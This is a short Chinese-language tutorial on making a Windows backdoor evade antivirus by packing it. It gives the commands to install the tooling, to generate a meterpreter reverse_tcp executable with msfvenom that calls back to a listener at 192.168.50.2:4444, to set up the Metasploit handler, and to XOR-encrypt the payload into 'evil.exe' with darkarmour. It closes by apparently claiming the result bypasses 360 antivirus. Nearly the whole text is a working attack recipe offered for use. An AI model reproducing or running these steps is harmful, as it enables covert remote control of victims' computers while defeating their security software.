免杀之:exe加壳免杀
目录1 环境准备
-
安装信赖文件:
apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode
2 生成后门文件
-
利用MSF生成exe后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.50.2 lport=4444 -f exe -o exploit.exe
-
kali监听
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.50.2
3 加壳
-
使用darkarmour对
exploit.exe
后门加壳./darkarmour.py -f exploit.exe -e xor --jmp -o evil.exe -l 5
-
360免杀